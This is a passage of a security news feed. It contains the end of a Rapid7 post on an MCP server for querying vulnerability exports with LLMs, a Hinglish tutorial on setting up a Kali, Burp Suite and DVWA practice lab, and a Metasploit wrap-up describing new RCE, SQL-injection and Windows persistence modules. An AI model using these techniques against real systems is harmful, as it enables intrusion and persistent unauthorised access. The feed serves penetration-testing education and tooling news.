dashboard work. But the people who need those answers aren’t always security specialists. They may be IT partners, compliance stakeholders, or executives who want clarity but might not need to understand the underlying query logic.</span></p><p><span>The MCP server helps lower that barrier: Instead of starting with raw exports and working backward, teams can start with the question they need answered.</span></p><h2>The bigger picture: MCP and CTEM</h2><p><span>This approach also aligns with the broader shift toward </span><a href="https://www.rapid7.com/fundamentals/what-is-continuous-threat-exposure-management-ctem/" target="_blank"><span>continuous threat exposure management</span></a><span>, or CTEM. </span></p><p><span>CTEM is about helping teams move beyond point-in-time findings toward a more continuous, contextual understanding of risk. That requires security data that can be accessed, connected, and used across the workflows teams rely on. </span></p><p><span>Bulk Export helps make that possible by giving customers more flexibility in how they use Rapid7 data. The open-source MCP server makes it easier to bring that data into AI-assisted and custom workflows.</span></p><p><span></span></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted40306e513a9c96/69e76b8e735697b8afb9212b/image1.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image1.png" asset-alt="image1.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted40306e513a9c96/69e76b8e735697b8afb9212b/image1.png" data-sys-asset-uid="blted40306e513a9c96" data-sys-asset-filename="image1.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image1.png" sys-style-type="display"></figure><p>⠀</p><p><span>That can support more continuous exposure management workflows by making it easier for teams to triage vulnerability and exposure data. For example, an analyst facing a large queue of new vulnerabilities could use LLM assistance to quickly narrow in on the findings most likely to need attention first. Instead of manually working through exports and queries, they could ask natural-language questions to surface the exposures tied to critical assets, unresolved remediation work, or other signals available in the data.</span></p><h2>From data portability to AI-ready interoperability</h2><p><span>Bulk Export was already an important step toward giving customers more control over their data. It made it easier to extract and use security telemetry in external tools and analytics environments.</span></p><p><span>The open-source MCP server builds on that foundation: Instead of using exported data only for dashboards or custom reporting, customers can now use that same data in AI-native experiences. That includes internal assistants, private copilots, workflow automation, and natural-language exploration of vulnerability and exposure data. This makes existing security data easier to use in the environments customers are already investing in.</span></p><h2>How it works</h2><p><span>At a high level, the architecture is straightforward. Using the Agent Skill, your LLM runs the MCP server locally and automatically prepares the environment by performing the bulk export and loading the data into a local file store. The Agent Skill provides the schemas and knowledge, with the MCP providing the tools to access this data. The LLM then will answer any question by querying, summarizing, and synthesising data locally – an extremely fast and simple process that's for the LLM. </span></p><p><span>Depending on the data a customer exports, answers can include vulnerability records, asset data, remediated vulnerabilities, and policy-related results.</span></p><p><span>The point here isn't just that a model can access the data, it’s that an open-source layer helps customers inspect, adapt, and extend over time, empowering teams to control how that connection works in their own environment. </span></p><h2>What customers can do with it</h2><p><span>This opens the door to practical use cases, including:</span></p><ul><li><p><span>Using LLM assistance to triage vulnerability data faster </span></p></li><li><p><span>Asking natural-language questions to spot exposure and remediation trends</span></p></li><li><p><span>Investigating which assets are tied to the most urgent vulnerabilities</span></p></li><li><p><span>Understanding what changed over time without manual analysis</span></p></li><li><p><span>Exploring policy failures without building manual queries</span></p></li><li><p><span>Feeding Rapid7 telemetry into private AI assistants and internal workflows</span></p></li><li><p><span>Making reporting more accessible for non-technical stakeholders</span></p></li></ul><p></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt067fcac94d548c56/69e76bafebfc7b856c038ea1/image2.png" class="embedded-asset" content-type-uid="sys_assets" type="asset" alt="image2.png" asset-alt="image2.png" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt067fcac94d548c56/69e76bafebfc7b856c038ea1/image2.png" data-sys-asset-uid="blt067fcac94d548c56" data-sys-asset-filename="image2.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="image2.png" sys-style-type="display"></figure><p>⠀</p><p><span>For teams already trying to operationalize AI, this creates a lower-friction path. Instead of building every integration from the ground up, they can start with a reusable bridge and focus on the workflows they want to enable.</span></p><h2>A better path from data to action</h2><p><span>Security data only creates value when teams can use it. For many organizations, turning raw telemetry into timely answers is still harder than it should be. Analysts need speed. Leaders need clarity. Builders need flexibility. And more customers want security data that works inside the tools and workflows they already rely on.</span></p><p><span>The open-source MCP server for Bulk Export is designed to help make that possible.</span></p><p><span>Bulk Export helps customers take control of their data. This is the next step: helping them put that data to work in AI-ready security workflows.</span></p><p><span>Ready to explore it for yourself? Visit the </span><a href="https://github.com/rapid7/rapid7-bulk-export-mcp" target="_blank"><span>Rapid7 Bulk Export MCP Server project on GitHub</span></a><span> to learn more and get started.</span></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apna Hacker Lab Setup Karo Kali Linux + VirtualBox + Burp Suite (Hinglish Mein)]]></title>
<description><![CDATA[Series: Bug Bounty Zero se Hero 🦸 | Article #2By HackerMD | 12 min readAaj Kya Seekhenge?VirtualBox kya hai aur kyun chahiyeKali Linux kya hai aur kaise install kareinBurp Suite setup karnaLab test karna — ready hai ya nahi⚠️ Note: Yeh sab apne computer pe safely install hoga — kisi bhi doosre ke...]]></description>
<link>https://tsecurity.de/de/3446495/hacking/apna-hacker-lab-setup-karo-kali-linux-virtualbox-burp-suite-hinglish-mein/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3446495/hacking/apna-hacker-lab-setup-karo-kali-linux-virtualbox-burp-suite-hinglish-mein/</guid>
<pubDate>Sun, 19 Apr 2026 20:23:20 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*e-7iRuuEeNQw0S1H1_endg.png"></figure><p><strong>Series: Bug Bounty Zero</strong> <strong>se Hero 🦸 | Article #2</strong><br><em>By HackerMD | 12 min read</em></p><h3>Aaj Kya Seekhenge?</h3><ul><li>VirtualBox kya hai aur kyun chahiye</li><li>Kali Linux kya hai aur kaise install karein</li><li>Burp Suite setup karna</li><li>Lab test karna — ready hai ya nahi</li></ul><blockquote><em>⚠️ </em><strong><em>Note:</em></strong><em> Yeh sab apne computer pe safely install hoga — kisi bhi doosre ke system ko koi nuksaan nahi hoga। Yeh sirf </em><strong><em>tumhara personal learning lab</em></strong><em> hai!</em></blockquote><h3>Pehle SamjhoHacker Lab Kyun Chahiye?</h3><p>Ek example se samjhate hain:</p><p>Maan lo tum <strong>driving seekhna chahte ho।</strong></p><p>Kya tum seedha <strong>highway pe</strong> practice karoge? ❌ Nahi!<br> Pehle <strong>closed ground</strong> pe practice karoge wahan koi risk nahi। ✅</p><p><strong>Exactly yahi kaam karta hai Hacker Lab!</strong></p><p>Hum ek <strong>virtual computer</strong> banate hain apne computer ke andar hi। Usme hacking tools install karte hain। Agar kuch gadbad bhi ho toh sirf woh virtual computer kharaab hoga, tumhara asli computer safe rahega! 🛡️</p><h3>Teen Cheezein Chahiye Tumhe</h3><pre>🖥️ Tumhara Computer (Windows/Mac)<br>         ↓<br>📦 VirtualBox (Virtual Computer banane ka software)<br>         ↓<br>🐉 Kali Linux (Hacker wala Operating System)<br>         ↓<br>🔫 Burp Suite (Web hacking ka main weapon)</pre><h3>System Requirements Pehle Check Karo!</h3><p>Apna computer check karo yeh minimum hona chahiye:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/727/1*ZULQWGhGRE8xjtgPf3gWNg.png"></figure><h3>Virtualization Enable Hai Ya Nahi? Check Karo:</h3><pre>1. Task Manager kholo (Ctrl + Shift + Esc)<br>2. "Performance" tab pe click karo<br>3. "CPU" pe click karo<br>4. Neeche dekho — "Virtualization: Enabled" likha hoga ✅</pre><p>Agar <strong>“Disabled”</strong> likha hai ghabrao mat, aage fix bata denge!</p><h3>PART 1: VirtualBox Install Karo</h3><h3>VirtualBox Kya Hai?</h3><p>Simple bhasha mein <strong>VirtualBox ek dabba hai</strong> jisme tum <strong>doosra computer</strong> chala sakte ho! Jaise <strong>phone ke andar phone</strong> aisa samjho</p><p>Tum apne Windows computer pe VirtualBox ke zariye <strong>Kali Linux</strong> chala sakte ho bina kuch bhi change kiye!</p><h3>Step 1: VirtualBox Download Karo</h3><ol><li>Browser mein jaao: <strong>virtualbox.org</strong></li><li><strong>“Downloads”</strong> button pe click karo</li><li><strong>“Windows hosts”</strong> wala link click karo</li><li>File download hogi size lagbhag <strong>100 MB</strong></li></ol><h3>Step 2: VirtualBox Install Karo</h3><p><strong>Yeh steps bilkul dhyan se follow karo ek ek karke:</strong></p><pre>1️⃣ Downloaded file pe DOUBLE CLICK karo<br>2️⃣ "Yes" pe click karo (UAC permission window aayegi)<br>3️⃣ "Next" click karo<br>4️⃣ "Next" click karo (sabhi features default rehne do)<br>5️⃣ "Yes" click karo (network interface warning)<br>6️⃣ "Install" click karo<br>7️⃣ Wait karo... 2-3 minute lagenge<br>8️⃣ "Finish" click karo ✅</pre><blockquote><em>💡 </em><strong><em>Tip:</em></strong><em> Install ke dauran internet temporarily disconnect ho sakta hai normal hai, ghabrao mat!</em></blockquote><h3>Agar Error Aaye VT-x/AMD-V Error</h3><p>Yeh error aati hai jab <strong>Virtualization disabled</strong> hoti hai। Fix karna super easy hai:</p><p><strong>YouTube pe dekho (Hindi mein):</strong><br> 👉 <a href="https://youtu.be/ba6OxmEeNVI"><strong>youtu.be/ba6OxmEeNVI</strong></a> — VT Virtualization Fix[<a href="https://www.youtube.com/watch?v=xYeVmkw4Juw">youtube</a>]​</p><h3>PART 2: Kali Linux Download aur Import Karo</h3><h3>Kali Linux Kya Hai?</h3><p>Kali Linux ek <strong>special Operating System</strong> hai jo specifically <strong>ethical hackers</strong> ke liye banaya gaya hai</p><p>Isme <strong>600+ hacking tools</strong> pehle se installed hote hain! Jaise:</p><ul><li>Nmap, Burp Suite, Metasploit</li><li>Wireshark, John the Ripper, SQLmap</li><li>Subfinder, Nuclei, aur bahut kuch</li></ul><p><strong>Normal Windows/Mac pe yeh tools nahi hote Kali Linux pe sab ready milta hai!</strong></p><h3>Step 3: Kali Linux Download Karo (Pre-built Image)</h3><blockquote><em>🌟 </em><strong><em>Smart Shortcut:</em></strong><em> Kali Linux ko </em><strong><em>ISO se install</em></strong><em> karne mein 30–40 minute lagte hain। Lekin ek </em><strong><em>pre-built VirtualBox image</em></strong><em> hai jo seedha import ho jaata hai sirf </em><strong><em>5 minute mein ready!</em></strong></blockquote><ol><li>Jaao: <strong>kali.org/get-kali</strong></li><li><strong>“Virtual Machines”</strong> tab pe click karo</li><li><strong>“VirtualBox”</strong> wala option choose karo</li><li><strong>64-bit</strong> file download karo — size lagbhag <strong>3–4 GB</strong> hai</li><li>Downloaded file ka extension hoga: <strong>.ova</strong></li></ol><h3>Step 4: Kali Linux Import Karo VirtualBox Mein</h3><pre>1️⃣ VirtualBox open karo<br>2️⃣ Top menu mein "File" → "Import Appliance" click karo<br>3️⃣ Folder icon pe click karo → apni .ova file select karo<br>4️⃣ "Next" click karo<br>5️⃣ "Import" click karo<br>6️⃣ Wait karo... 5-10 minute lagenge ⏳<br>7️⃣ Import complete! Kali Linux list mein dikh jayega ✅</pre><h3>Step 5: Kali Linux Start Karo</h3><pre>1️⃣ VirtualBox mein "Kali Linux" select karo<br>2️⃣ Green "Start" button dabaao ▶️<br>3️⃣ Ek nayi window khulegi — yahi tumhara virtual computer hai!<br>4️⃣ Login screen aayegi</pre><p><strong>Default Login Credentials:</strong></p><pre>Username: kali<br>Password: kali</pre><blockquote><em>🎉 </em><strong><em>Congratulations! Tumhara Kali Linux ready hai!</em></strong></blockquote><h3>Video Tutorial Dekho Yahan:</h3><p><strong>Best Hindi Tutorial (2025–2026):</strong></p><p>Kali Linux 2025.3 VirtualBox Easy Setup</p><p><a href="https://youtube.com/watch?v=DIIxk5F2JCY">youtube.com/watch?v=DIIxk5F2JCY</a></p><p>Kali Linux 2026 VirtualBox Install</p><p><a href="https://youtube.com/watch?v=U9tgf7Gr9lA">youtube.com/watch?v=U9tgf7Gr9lA</a></p><p>Hindi Mein Step-by-Step</p><p><a href="https://youtube.com/watch?v=585Zi8koHbs">youtube.com/watch?v=585Zi8koHbs</a></p><h3>PART 3: Burp Suite Setup Karo</h3><h3>Burp Suite Kya Hai?</h3><p>Bug bounty hunters ka <strong>sabse important weapon!</strong></p><p>Ek analogy se samjho:</p><p>Jab tum website pe kuch click karte ho browser <strong>request</strong> bhejta hai server ko, server <strong>response</strong> bhejta hai wapas। Yeh sab bahut fast hota hai tum dekh nahi sakte</p><p><strong>Burp Suite ek </strong><strong>man in the middle hai</strong> woh in sab requests aur responses ko <strong>pakad leta hai</strong>, tumhe dikhata hai, aur tum unhe <strong>edit bhi kar sakte ho!</strong></p><pre>NORMAL:<br>Browser  →  Request  →  Server<br>Browser  ←  Response  ←  Server<br><br>BURP SUITE KE SAATH:<br>Browser → Request → [BURP SUITE] → Server<br>Browser ← Response ← [BURP SUITE] ← Server<br>                          ↕<br>                    Tum dekh sakte ho<br>                    aur edit kar sakte ho!</pre><p>Yahi se milte hain bugs!</p><h3>Kali Linux Mein Burp Suite Pehle Se Installed Hai!</h3><p>Haan dost! Kali Linux mein Burp Suite Community Edition <strong>already installed</strong> hota hai</p><p><strong>Kaise open karein:</strong></p><pre>Method 1 — Menu se:<br>1. Kali Linux mein Applications menu kholo<br>2. "Web Application Analysis" section mein jaao<br>3. "burpsuite" pe click karo ✅<br><br>Method 2 - Terminal se:<br>1. Terminal kholo (Ctrl + Alt + T)<br>2. Type karo: burpsuite<br>3. Enter dabaao ✅</pre><h3>Step 6: Burp Suite First Time Setup</h3><p>Pehli baar kholne pe:</p><pre>1️⃣ "Temporary project" select karo → "Next"<br>2️⃣ "Use Burp defaults" select karo → "Start Burp"<br>3️⃣ Burp Suite khul jayega! 🎉</pre><p><strong>Yeh tabs samjho:</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/728/1*dOyULy0eCcOPKtpo8b6-bw.png"></figure><h3>Step 7: Browser Configure Karo Burp Suite Ke Saath</h3><p>Burp Suite ko browser se connect karna padega। <strong>Yeh sabse important step hai!</strong></p><p><strong>Kali Linux mein Firefox already hota hai:</strong></p><pre>1️⃣ Firefox open karo<br>2️⃣ Address bar mein likho: about:preferences<br>3️⃣ "Network Settings" section mein jaao<br>4️⃣ "Settings" button click karo<br>5️⃣ "Manual proxy configuration" select karo<br>6️⃣ HTTP Proxy: 127.0.0.1 | Port: 8080<br>7️⃣ "Also use this proxy for HTTPS" check karo<br>8️⃣ "OK" click karo ✅</pre><h3>Step 8: Burp Certificate Install Karo (HTTPS ke liye)</h3><p>HTTPS websites dekh sako iske liye certificate chahiye:</p><pre>1️⃣ Burp Suite mein "Proxy" → "Options" mein jaao<br>2️⃣ Firefox mein jaao: http://burp<br>3️⃣ "CA Certificate" download karo<br>4️⃣ Firefox → Preferences → "View Certificates"<br>5️⃣ "Import" → downloaded certificate select karo<br>6️⃣ Dono checkboxes tick karo → OK ✅</pre><p><strong>Ab tum HTTPS websites bhi intercept kar sakte ho!</strong></p><h3>Burp Suite Install Tutorial:</h3><p>Burp Suite Pro Free Install 2025</p><p><a href="https://youtube.com/watch?v=eiH9IeTlTQA">youtube.com/watch?v=eiH9IeTlTQA</a> [<a href="https://www.youtube.com/watch?v=eiH9IeTlTQA">youtube</a>]​</p><p>Burp Suite Kali Linux Setup</p><p><a href="https://youtube.com/watch?v=oPZCqFdULLM">youtube.com/watch?v=oPZCqFdULLM</a> [<a href="https://www.youtube.com/watch?v=oPZCqFdULLM">youtube</a>]​</p><h3>PART 4: Lab Test Karo Sab Ready Hai?</h3><h3>Final Checklist:</h3><pre>☐ VirtualBox installed hai<br>☐ Kali Linux import ho gaya<br>☐ Kali Linux start ho raha hai<br>☐ Login ho rahe ho (kali/kali)<br>☐ Burp Suite open ho raha hai<br>☐ Firefox proxy set hai<br>☐ Certificate install hai</pre><h3>Test #1: Burp Suite Kaam Kar Raha Hai?</h3><pre>1. Kali Linux mein Burp Suite open karo<br>2. "Proxy" tab → "Intercept is ON" karo<br>3. Firefox mein jaao: http://google.com<br>4. Burp Suite mein request DIKHE — SUCCESS! ✅<br>5. "Forward" press karo tab page load hoga</pre><h3>Test #2: Free Practice Lab DVWA</h3><p>Bug bounty practice ke liye ek free <strong>legal target</strong> hai:</p><pre># Terminal mein yeh commands likho:<br>sudo apt update<br>sudo apt install dvwa -y<br>sudo dvwa-start</pre><p>Phir Firefox mein jaao: <a href="http://127.0.0.1/dvwa"><strong>http://127.0.0.1/dvwa</strong></a></p><p>Yeh ek <strong>intentionally vulnerable website</strong> hai — specifically practice ke liye banai gayi hai! Yahan tum bina kisi legal problem ke hacking practice kar sakte ho!</p><h3>Common Problems aur Solutions</h3><h3>Problem 1: Kali Linux slow chal raha hai</h3><pre>Solution:<br>VirtualBox → Settings → System → Processor<br>2 CPUs assign karo<br><br>VirtualBox → Settings → Display<br>Video Memory 128MB karo ✅</pre><h3>Problem 2: Kali Linux mein internet nahi chal raha</h3><pre>Solution:<br>VirtualBox → Settings → Network<br>Adapter 1: NAT select karo ✅</pre><h3>Problem 3: Burp Suite nahi khul raha</h3><pre>Solution — Terminal mein likho:<br>sudo apt update &amp;&amp; sudo apt install burpsuite -y<br>burpsuite ✅</pre><h3>Problem 4: Screen bahut chota dikh raha hai</h3><pre>Solution:<br>View menu → Auto-resize Guest Display ✅<br>Ya: VirtualBox Guest Additions install karo</pre><h3>Tumhara Complete Hacker Lab Overview</h3><pre>💻 Tumhara Windows Computer<br>├── 📦 VirtualBox<br>│   └── 🐉 Kali Linux (Virtual Machine)<br>│       ├── 🔫 Burp Suite (Web Proxy)<br>│       ├── 🌐 Firefox (Configured Browser)<br>│       ├── 🔍 Nmap (Network Scanner)<br>│       ├── 🕷️ SQLMap (SQL Injection)<br>│       ├── 🎯 Subfinder (Recon Tool)<br>│       └── 📡 Nuclei (Vulnerability Scanner)<br>└── 🛡️ Tumhara Asli Computer — 100% SAFE!</pre><h3>Aaj Ka Homework!</h3><pre>1️⃣ VirtualBox install karo ✅<br>2️⃣ Kali Linux .ova file download karo ✅<br>3️⃣ Import aur start karo ✅<br>4️⃣ Burp Suite open karo ✅<br>5️⃣ DVWA install karo aur ek baar explore karo ✅</pre><p><strong>Agar koi step pe atko neeche comment karo, main help karunga!</strong></p><h3>Meri Baat…</h3><p>Jab maine pehli baar Kali Linux install ki thi mujhse bhi galti hui। Screen black ho gayi, restart karna pada। Teen baar try kiya tab succeed hua।</p><p><strong>Dost, frustration aayegi that’s normal।</strong> Har ek hacker ne yahi sab face kiya hai। Jo persist karta hai woh jeet ta hai।</p><p>Agle article mein hum sikhenge <strong>“Internet Kaise Kaam Karta Hai HTTP, HTTPS, Requests, Responses” </strong>jo ki bug bounty ka asli <strong>backbone</strong> hai! 🔥</p><p><strong><em>HackerMD</em></strong><em> Bug Bounty Hunter | Cybersecurity Researcher</em><br> <em>GitHub: </em><a href="https://github.com/BotGJ16"><em>BotGJ16</em></a><em> | Medium: </em><a href="https://medium.com/@HackerMD"><em>@HackerMD</em></a></p><p><em>#KaliLinux #VirtualBox #BurpSuite #HackerLab #BugBounty #EthicalHacking #Hinglish #CyberSecurity #SetupGuide</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=59a3adb74b97" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/apna-hacker-lab-setup-karo-kali-linux-virtualbox-burp-suite-hinglish-mein-59a3adb74b97">Apna Hacker Lab Setup Karo Kali Linux + VirtualBox + Burp Suite (Hinglish Mein)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 04/17/2026]]></title>
<description><![CDATA[Happy Friday - Seven New Metasploit ModulesWe’re happy to announce that Metasploit Framework had a big week, landing seven new modules alongside various bug fixes and enhancements. This week’s highlights include RCE modules targeting AVideo, openDCIM, Selenium Grid/Selenoid, and ChurchCRM. On the...]]></description>
<link>https://tsecurity.de/de/3443244/it-security-nachrichten/metasploit-wrap-up-04172026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3443244/it-security-nachrichten/metasploit-wrap-up-04172026/</guid>
<pubDate>Fri, 17 Apr 2026 23:07:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>Happy Friday - Seven New Metasploit Modules</h2><p>We’re happy to announce that Metasploit Framework had a big week, landing seven new modules alongside various bug fixes and enhancements. This week’s highlights include RCE modules targeting AVideo, openDCIM, Selenium Grid/Selenoid, and ChurchCRM. On the post-exploitation side, Windows saw three new persistence techniques added as modules, targeting Telemetry scheduled tasks, PowerShell profiles, and Microsoft BITS.</p><p>What a time to be alive as a Metasploit user! We wish you all a wonderful weekend and happy hacking.</p><h2>New module content (7)</h2><h3>AVideo Unauthenticated SQL Injection Credential Dump</h3><p>Authors: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a> and arkmarta</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21075">#21075</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: gather/avideo_catname_sqli</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-28501&amp;referrer=blog">CVE-2026-28501</a></p><p>Description: Adds an auxiliary module for CVE-2026-28501, an unauthenticated SQL injection in AVideo &lt;= 22.0, along with a new BenchmarkBasedBlind SQLi mixin class and blind extraction improvements.</p><h3>openDCIM install.php SQL Injection to RCE</h3><p>Author: Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a></p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21034">#21034</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: linux/http/opendcim_install_sqli_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2026-28517&amp;referrer=blog">CVE-2026-28517</a></p><p>Description: This PR adds a new exploit module for openDCIM that chains three vulnerabilities (<a href="https://github.com/advisories/GHSA-mg2w-x76x-59h8">https://github.com/advisories/GHSA-mg2w-x76x-59h8</a>, <a href="https://github.com/advisories/GHSA-prmh-rp39-qc4m">https://github.com/advisories/GHSA-prmh-rp39-qc4m</a>, <a href="https://github.com/advisories/GHSA-428h-8xhf-g3cw">https://github.com/advisories/GHSA-428h-8xhf-g3cw</a>) to achieve remote code execution.</p><h3>Selenium Grid/Selenoid Unauthenticated RCE</h3><p>Authors: Jon Stratton, Takahiro Yokoyama, Valentin Lobstein <a href="mailto:chocapikk@leakix.net">chocapikk@leakix.net</a>, and Wiz Research</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21003">#21003</a> contributed by <a href="https://github.com/Chocapikk">Chocapikk</a></p><p>Path: linux/http/selenium_greed_rce</p><p>Description: This replaces the two separate Selenium Grid RCE modules (Chrome and Firefox) with a single unified module that auto-detects available browsers and selects the best attack vector. The module targets unauthenticated Selenium Grid and Selenoid instances, supporting two techniques: a Firefox profile handler injection that works on all Grid versions including the latest (never patched since 2021), and a Chrome binary override for Grid versions prior to 4.11.0 and all Selenoid versions. No authentication is required.</p><h3>ChurchCRM Database Restore RCE 6.2.0</h3><p>Author: LucasCsmt</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/21095">#21095</a> contributed by <a href="https://github.com/LucasCsmt">LucasCsmt</a></p><p>Path: multi/http/churchcrm_db_restore_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-68109&amp;referrer=blog">CVE-2025-68109</a></p><p>Description: Adds a new exploit module for CVE-2025-68109, targeting a file upload vulnerability inside ChurchCRM leading to an RCE. This module will work on version 6.2.0 of ChurchCRM and earlier.</p><h3>Windows Persistence Bits Job</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20839">#20839</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/bits</p><p>Description: This adds a new persistence module that uses Microsoft Bits to maintain access to the system.</p><h3>Powershell Profile Persistence</h3><p>Author: madefourit</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20933">#20933</a> contributed by <a href="https://github.com/madefourit">madefourit</a></p><p>Path: windows/persistence/powershell_profile</p><p>Description: This adds a new persistence module that uses powershell profiles to maintain access.</p><h3>Windows Telemetry Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20843">#20843</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: windows/persistence/telemetry</p><p>Description: Adds a new persistence module, exploit/windows/persistence/telemetry, that abuses the Windows Telemetry scheduled task (Microsoft Compatibility Appraiser / CompatTelRunner) to establish persistence. The module writes a payload to disk and configures the telemetry task to execute it, resulting in a SYSTEM-level Meterpreter session either on the next scheduled run or immediately on demand. Requires an admin-level Meterpreter session on the target.</p><h2>Enhancements and features (11)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21078">#21078</a> from <a href="https://github.com/Chocapikk">Chocapikk</a> - Adds multiple improvements to the multi/http/churchcrm_install_unauth_rce module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21085">#21085</a> from <a href="https://github.com/dledda-r7">dledda-r7</a> - This refactors the Block API code used by Windows payloads to leverage a new version of the hashing algorithm. This also fixes a bug whereby the MaximumLength field was used when calculating UNICODE_STRING names when it should have been the Length field.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21236">#21236</a> from <a href="https://github.com/bcoles">bcoles</a> - Add riscv64le and riscv32le architecture support to the fileless fetch payload adapter. This enables in-memory ELF execution via memfd_create on RISC-V Linux targets without writing to disk.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21252">#21252</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Adds a new with_adcs_certificate_request method that now used by both the MsIcpr and WebEnrollment mixins that abstracts away the enrollment process and takes a block that performs the actual request. The result is consolidation of messages, post-processing of the successfully issued certificate.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21255">#21255</a> from <a href="https://github.com/mxnvel">mxnvel</a> - This updates two Python payloads (cmd/unix/reverse_python and cmd/unix/reverse_python_ssl) to make the PythonPath option optional. When omitted, it defaults to a shim that will determine the appropriate version of Python at runtime using a small bash expression.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21275">#21275</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Adds multiple improvements to the cve_2025_14847_mongobleed module, such as adding new a dedicated check method, improved compression support detection as only zlib can be exploited, and resolving other false positives.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21286">#21286</a> from <a href="https://github.com/Hemang360">Hemang360</a> - Adds a cleanup keyword argument to Msf::Post::File#mkdir so callers can skip automatic directory cleanup registration. It is very useful for when we create directories in persistence modules and want the directory to remain.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21289">#21289</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates the db.hosts RPC call to now additionally include the comments associated with the host.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21291">#21291</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates the module.info RPC call to now additionally include the notes associated with the module.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21304">#21304</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Improves multiple auxiliary module check code messages and statuses.</li></ul><h2>Bugs fixed (4)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/21027">#21027</a> from <a href="https://github.com/SilentSobs">SilentSobs</a> - Fixes ELF shared object (elf-so) payload generation failing on 32-bit ARM Linux and RISC-V 32-bit LE targets. The _start entry point in the ARM LE template was landing at a non-word-aligned offset, which violates the architecture's 4-byte alignment requirement and caused the shared object to fail to load. The templates now use proper NASM align directives to ensure correct entry point alignment, and a similar fix is applied to the RISC-V 32-bit LE template.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21268">#21268</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes a crash with a small number of auxiliary modules when the check method was run and the vulnerability wasn't present.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21287">#21287</a> from <a href="https://github.com/zeroSteiner">zeroSteiner</a> - Fixes the EXE templates that were rebuilt in <a href="https://github.com/rapid7/metasploit-framework/pull/20502">https://github.com/rapid7/metasploit-framework/pull/20502</a> to work on legacy Windows targets like Server 2000 in case you find yourself in a combination hacking and time-travelling movie.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/21309">#21309</a> from <a href="https://github.com/sfewer-r7">sfewer-r7</a> - Fixes a false positive in the fortinet_fortiweb_create_admin module when detecting the presence of an authentication bypass via path traversal vulnerability in the Fortinet FortiWeb management interface.</li></ul><h2>Documentation added (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20843">#20843</a> from <a href="https://github.com/h00die">h00die</a> - Adds a new persistence module, exploit/windows/persistence/telemetry, that abuses the Windows Telemetry scheduled task (Microsoft Compatibility Appraiser / CompatTelRunner) to establish persistence. The module writes a payload to disk and configures the telemetry task to execute it, resulting in a SYSTEM-level Meterpreter session either on the next scheduled run or immediately on demand. Requires an admin-level Meterpreter session on the target.</li></ul><p>You can always find more documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a 